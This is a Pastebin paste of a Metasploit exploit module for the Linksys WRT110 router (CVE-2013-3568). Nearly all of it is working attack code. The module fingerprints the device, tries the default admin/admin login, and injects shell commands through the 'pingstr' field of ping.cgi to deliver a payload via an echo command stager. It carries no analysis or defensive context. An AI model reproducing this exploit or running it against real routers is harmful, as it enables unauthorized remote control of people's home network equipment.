Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # This file is part of the Metasploit Framework and may be subject to
- # redistribution and commercial restrictions. Please see the Metasploit
- # web site for more information on licensing and terms of use.
- # http://metasploit.com/
- ##
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::Exploit::Remote::HttpClient
- include Msf::Exploit::CmdStagerEcho
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Linksys WRT110 Remote Command Execution',
- 'Description' => %q{
- The Linksys WRT110 consumer router is vulnerable to a command injection
- exploit in the ping field of the web interface.
- },
- 'Author' =>
- [
- 'Craig Young', # Vulnerability discovery
- 'joev', # msf module
- 'juan vazquez' # module help + echo cmd stager
- ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['CVE', '2013-3568'],
- ['BID', '61151'],
- ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
- ],
- 'DisclosureDate' => 'Jul 12 2013',
- 'Privileged' => true,
- 'Platform' => ['linux'],
- 'Arch' => ARCH_MIPSLE,
- 'Targets' =>
- [
- ['Linux mipsel Payload', { } ]
- ],
- 'DefaultTarget' => 0,
- ))
- register_options([
- OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
- OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
- OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
- OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
- ], self.class)
- end
- def check
- begin
- res = send_request_cgi({
- 'uri' => '/HNAP1/'
- })
- rescue ::Rex::ConnectionError
- return Exploit::CheckCode::Safe
- end
- if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
- return Exploit::CheckCode::Vulnerable
- end
- return Exploit::CheckCode::Safe
- end
- def exploit
- test_login!
- execute_cmdstager
- end
- # Sends an HTTP request with authorization header to the router
- # Raises an exception unless the login is successful
- def test_login!
- print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
- res = send_auth_request_cgi({
- 'uri' => '/',
- 'method' => 'GET'
- })
- if not res or res.code == 401 or res.code == 404
- fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
- else
- print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
- end
- end
- # Run the command on the router
- def execute_command(cmd, opts)
- send_auth_request_cgi({
- 'uri' => '/ping.cgi',
- 'method' => 'POST',
- 'vars_post' => {
- 'pingstr' => '& ' + cmd
- }
- })
- Rex.sleep(1) # Give the device a second
- end
- # Helper methods
- def user; datastore['USERNAME']; end
- def pass; datastore['PASSWORD'] || ''; end
- def send_auth_request_cgi(opts={}, timeout=nil)
- timeout ||= datastore['TIMEOUT']
- opts.merge!('authorization' => basic_auth(user, pass))
- begin
- send_request_cgi(opts, timeout)
- rescue ::Rex::ConnectionError
- fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
- end
- end
- end
- # FEFF829931B58D78 1337day.com [2013-10-15] 54E87349A9A2FCC7 #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement